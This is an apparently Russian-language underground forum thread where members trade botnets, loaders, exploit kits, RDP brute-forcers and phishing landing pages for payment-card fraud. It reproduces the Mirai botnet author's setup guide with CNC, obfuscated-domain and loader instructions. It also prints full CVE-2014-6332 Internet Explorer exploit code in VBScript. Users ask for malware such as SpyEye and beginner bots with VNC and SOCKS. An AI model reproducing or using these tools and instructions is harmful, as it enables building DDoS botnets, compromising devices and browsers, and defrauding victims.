паблик ботнеты связки постим тут

Gaudox Loader

Интересуют андро боты, есть у кого норм с пабла? поиграться так сказать.

AVG Free : Clean
Avast : Clean
AntiVir (Avira) : Clean
BitDefender : Clean
Clam Antivirus : Clean
COMODO Internet Security : Clean
Dr.Web : Clean
eTrust-Vet : Clean
F-PROT Antivirus : Clean
F-Secure Internet Security : Clean
G Data : Clean
IKARUS Security : Clean
Kaspersky Antivirus : Clean
McAfee : Clean
MS Security Essentials : Clean
ESET NOD32 : Clean
Norman : Clean
Norton Antivirus : Clean
Panda Security : Clean
A-Squared : Clean
Quick Heal Antivirus : Clean
Solo Antivirus : Clean
Sophos : Clean
Trend Micro Internet Security : Clean
VBA32 Antivirus : Clean
Zoner AntiVirus : Clean
Ad-Aware : Clean
BullGuard : Clean
FortiClient : Clean
K7 Ultimate : Clean
NANO Antivirus : Clean
Panda CMD : Clean
VIPRE : Clean
SUPERAntiSpyware : Clean
Twister Antivirus : Clean

Gaudox Loader архив битый, можно перезалить?

лодырь перезалей плиз

Перезалей guadox. Буду благодарен

Лендинги для сбора Ukash, Paysafecard, для 45 стран, на 45 языках


Добавлено через 1 минуту 57 секунд
Hunter exploit kit


Добавлено через 3 минуты 53 секунды
SafeLoader

Скачать

Добавлено через 10 минут 21 секунду
NLBrute - RDP (NLA)

Mirai bot (source)


+инструкция для создания ботнета
============================
Greetz everybody,

When I first go in DDoS industry, I wasn’t planning on staying in it long. I made my money, there’s lots of eyes looking at IOT now, so it’s time to GTFO. However, I know every skid and their mama, it’s their wet dream to have something besides qbot.

So today, I have an amazing release for you. With Mirai, I usually pull max 380k bots from telnet alone. However, after the Kreb DDoS, ISPs been slowly shutting down and cleaning up their act. Today, max pull is about 300k bots, and dropping.

So, I am your senpai, and I will treat you real nice, my hf-chan.

And to everyone that thought they were doing anything by hitting my CNC, I had good laughs, this bot uses domain for CNC. It takes 60 seconds for all bots to reconnect, lol

Also, shoutout to this blog post by malwaremustdie

- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
Had a lot of respect for you, thought you were good reverser, but you really just completely and totally failed in reversing this binary. «We still have better kung fu than you kiddos» don’t make me laugh please, you made so many mistakes and even confused some different binaries with my. LOL

Let me give you some slaps back —
1) port 48101 is not for back connect, it is for control to prevent multiple instances of bot running together
2) /dev/watchdog and /dev/misc are not for «making the delay», it for preventing system from hanging. This one is low-hanging fruit, so sad that you are extremely dumb
3) You failed and thought FAKE_CNC_ADDR and FAKE_CNC_PORT was real CNC, lol «And doing the backdoor to connect via HTTP on 65.222.202.53». you got tripped up by signal flow wink.gif try harder skiddo
4) Your skeleton tool sucks ass, it thought the attack decoder was «sinden style», but it does not even use a text-based protocol? CNC and bot communicate over binary protocol
5) you say ‘chroot(«/») so predictable like torlus’ but you don’t understand, some others kill based on cwd. It shows how out-of-the-loop you are with real malware. Go back to skidland

5 slaps for you

Why are you writing reverse engineer tools? You cannot even correctly reverse in the first place. Please learn some skills first before trying to impress others. Your arrogance in declaring how you «beat me» with your dumb kung-fu statement made me laugh so hard while eating my SO had to pat me on the back.

Just as I forever be free, you will be doomed to mediocracy forever.

Requirements
2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loading

OP Requirements
2 VPS and 4 servers
— 1 VPS with extremely bulletproof host for database server
— 1 VPS, rootkitted, for scanReceiver and distributor
— 1 server for CNC (used like 2% CPU with 400k bots)
— 3x 10gbps NForce servers for loading (distributor distributes to 3 servers equally)

— To establish connection to CNC, bots resolve a domain (resolv.c/resolv.h) and connect to that IP address
— Bots brute telnet using an advanced SYN scanner that is around 80x faster than the one in qbot, and uses almost 20x less resources. When finding bruted result, bot resolves another domain and reports it. This is chained to a separate server to automatically load onto devices as results come in.
— Bruted results are sent by default on port 48101. The utility called scanListen.go in tools is used to receive bruted results (I was getting around 500 bruted results per second at peak). If you build in debug mode, you should see the utitlity scanListen binary appear in debug folder.

Mirai uses a spreading mechanism similar to self-rep, but what I call «real-time-load». Basically, bots brute results, send it to a server listening with scanListen utility, which sends the results to the loader. This loop (brute -> scanListen -> load -> brute) is known as real time loading.

The loader can be configured to use multiple IP address to bypass port exhaustion in linux (there are limited number of ports available, which means that there is not enough variation in tuple to get more than 65k simultaneous outbound connections — in theory, this value lot less). I would have maybe 60k — 70k simultaneous outbound connections (simultaneous loading) spread out across 5 IPs.
Bot has several configuration options that are obfuscated in (table.c/table.h). In ./mirai/bot/table.h you can find most descriptions for configuration options. However, in ./mirai/bot/table.c there are a few options you *need* to change to get working.

— TABLE_CNC_DOMAIN — Domain name of CNC to connect to — DDoS avoidance very fun with mirai, people try to hit my CNC but I update it faster than they can find new IPs, lol. Retards smile.gif
— TABLE_CNC_PORT — Port to connect to, its set to 23 already
— TABLE_SCAN_CB_DOMAIN — When finding bruted results, this domain it is reported to
— TABLE_SCAN_CB_PORT — Port to connect to for bruted results, it is set to 48101 already.

In ./mirai/tools you will find something called enc.c — You must compile this to output things to put in the table.c file

Run this inside mirai directory

./build.sh debug telnet

You will get some errors related to cross-compilers not being there if you have not configured them. This is ok, won’t affect compiling the enc tool

Now, in the ./mirai/debug folder you should see a compiled binary called enc. For example, to get obfuscated string for domain name for bots to connect to, use this:

./debug/enc string fuck.the.police.com
The output should look like this

XOR’ing 20 bytes of data…
x44x57x41x49x0Cx56x4Ax47x0Cx52x4Dx4Ex 4Bx41x47x0Cx41x4Dx4Fx22
To update the TABLE_CNC_DOMAIN value for example, replace that long hex string with the one provided by enc tool. Also, you see «XOR’ing 20 bytes of data». This value must replace the last argument tas well. So for example, the table.c line originally looks like this
add_entry(TABLE_CNC_DOMAIN, «x41x4Cx41x0Cx41x4Ax43x4Cx45x47x4Fx47 x0Cx41x4Dx4Fx22», 30); // cnc.changeme.com
Now that we know value from enc tool, we update it like this

add_entry(TABLE_CNC_DOMAIN, «x44x57x41x49x0Cx56x4Ax47x0Cx52x4Dx4E x4Bx41x47x0Cx41x4Dx4Fx22″, 20); // fuck.the.police.com
Some values are strings, some are port (uint16 in network order / big endian).
CONFIGURE THE CNC:
apt-get install mysql-server mysql-client

CNC requires database to work. When you install database, go into it and run following commands:


This will create database for you. To add your user,

INSERT INTO users VALUES (NULL, ‘anna-senpai’, ‘myawesomepassword’, 0, 0, 0, 0, -1, 1, 30, »);
Now, go into file ./mirai/cnc/main.go

Edit these values
const DatabaseAddr string = «127.0.0.1»
const DatabaseUser string = «root»
const DatabasePass string = «password»
const DatabaseTable string = «mirai»
To the information for the mysql server you just installed

Cross compilers are easy, follow the instructions at this link to set up. You must restart your system or reload .bashrc file for these changes to take effect.


The CNC, bot, and related tools:

How to build bot + CNC
In mirai folder, there is build.sh script.
./build.sh debug telnet

Will output debug binaries of bot that will not daemonize and print out info about if it can connect to CNC, etc, status of floods, etc. Compiles to ./mirai/debug folder
./build.sh release telnet

Will output production-ready binaries of bot that are extremely stripped, small (about 60K) that should be loaded onto devices. Compiles all binaries in format: «mirai.$ARCH» to ./mirai/release folder

Loader reads telnet entries from STDIN in following format:
iport userass
It detects if there is wget or tftp, and tries to download the binary using that. If not, it will echoload a tiny binary (about 1kb) that will suffice as wget.
./build.sh

Will build the loader, optimized, production use, no fuss. If you have a file in formats used for loading, you can do this
cat file.txt | ./loader
Remember to ulimit!

Just so it’s clear, I’m not providing any kind of 1 on 1 help tutorials or shit, too much time. All scripts and everything are included to set up working botnet in under 1 hours. I am willing to help if you have individual questions (how come CNC not connecting to database, I did this this this blah blah), but not questions like «My bot not connect, fix it»

#FREEAPPLEJ4CK

ohotnik а скинь плиз пасс на архив NLBrute - RDP (NLA)

эксплойт 0day
Багу подвержены буквально все браузеры: Google Chrome, Opera, Safari, MS Internet Explorer и даже MS Edge.

[flash]CVE-2015-0349

Добавлено через 8 минут 50 секунд
CVE-2014-6332 Exploit (IE all version exploit)
//*
allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.



*//

<!doctype html>
<html>
<meta http-equiv=X-UA-Compatible content=IE=EmulateIE8 >
<head>
</head>
<body>

<SCRIPT LANGUAGE=VBScript>

function runmumaa()
On Error Resume Next
set shell=createobject(Shell.Application)
shell.ShellExecute notepad.exe
end function

</script>

<SCRIPT LANGUAGE=VBScript>
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray

Begin()

function Begin()
On Error Resume Next
info=Navigator.UserAgent

if(instr(info,Win64)>0) then
exit function
end if

if (instr(info,MSIE)>0) then
intVersion = CInt(Mid(info, InStr(info, MSIE) + 5, 2))
else
exit function

end if

win9x=0

BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chr w(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw (0)

if(intVersion<4) then
document.write(<br> IE)
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function

function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function

function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
document.write(i)
Create=True
Exit For
End If
Next
end function

sub testaa()
end sub

function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)

ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314

aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function


function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)

j=0
j=readmemo(i+&h120+k)

Exit for
end if

next
ab(2)=1.69759663316747E-313
runmumaa()
end function

function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000

redim Preserve aa(a0)
redim ab(a0)

redim Preserve aa(a2)

type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10

If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function

end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if


If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If

redim Preserve aa(a0)

end function

function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)

ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))

ab(0)=0
redim Preserve aa(a0)
end function

</script>

</body>
</html>

скиньте что нибуть для начинаюших хацкеров и мануал как установить . Буду презнателен .
мне для себя 100-200 ботов контролировать , жетельно с ВНЦ .и сокс .

какой ключ бро?

Добавлено через 8 минут 30 секунд

Тоже таким характеристикам буду рад) покапался бы

Добавлено через 16 секунд

Тоже таким характеристикам буду рад) покапался бы

Ну хоть что-то для новичков бы написали, смотрю как дура и не понимаю что за проги? все ли нужно качать? для каких целей каждая? обязательно ли нужно все проги юзать? как устанавливать? куча вопросов..... такое ощущение, что сайту нужны просто посещение и все, ради чего реклама на другом бордере?

Ну хоть что-то для новичков бы написали, смотрю как дура и не понимаю что за проги?
это проги для геймеров. какие-то золото апают, какие-то хелсы и ману. но на доту и тд популярные нет ещё таких прог, так что возвращайся на свой форум.

loader Gaudox HTTP перезалил

Не стучит зараза

ищу бот для armmips архитектуры, ос пингвины. Кто что знает из живого?

Socket bot, Brute-Fore,WP,Joomla,SMTP,Email

Dowload:
40mb uncompressed, license key included

Есть spyeye у кого?)